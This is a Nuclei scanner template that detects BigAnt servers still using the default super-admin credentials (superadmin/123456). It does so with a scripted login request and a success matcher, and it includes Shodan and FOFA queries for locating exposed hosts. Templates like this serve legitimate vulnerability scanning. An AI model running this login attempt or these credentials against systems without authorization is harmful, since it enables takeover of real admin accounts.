bigant-default-login: BigAnt - Default Password

id: bigant-default-login

info:
  name: BigAnt - Default Password
  author: ritikchaddha
  severity: critical
  description: |
    Misconfiguratoin leads to Default Login into BigAnt Super Admin Account.
  reference:
    - https://www.bigantsoft.com/support/faq/2-4_How_to_switch_login_accounts_System_admin_Security_admin_Audit_admin_super_admin.html#:~:text=How%2Dto-,How%20to%20switch%20login%20accounts%3A%20System%20admin%2FSecurity%20admin%2F,password%20is%20123456%20by%20default.
  classification:
    cwe-id: CWE-522
  metadata:
    verified: true
    max-request: 2
    shodan-query: title:"BigAnt"
    fofa-query: title="BigAnt"
  tags: default-login,bigant,vuln

variables:
  username: "superadmin"
  password: "123456"

http:
  - raw:
      - |
        GET /index.php/Home/login/index.html HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /index.php/Home/Login/login_post.html HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        saas=default&account={{username}}&password={{base64(password)}}&to=admin&app=&__hash__={{hash}}&__hash__={{hash}}&submit=

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "Login Successfully! Loading..."
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        name: hash
        group: 1
        regex:
          - 'name="__hash__" content="([0-9a-z_]+)"'
        internal: true
# digest: 4a0a004730450221008f40707a1299194ff05324b0141d0db91aa2ff4d804c443e028e1a8e6c3fd97f022022fbbc63c2dd8d23a85d5dc81fa35ba5202e31607257113635a2b2d30a67b706:922c64590222798bb761d5b6d8e72950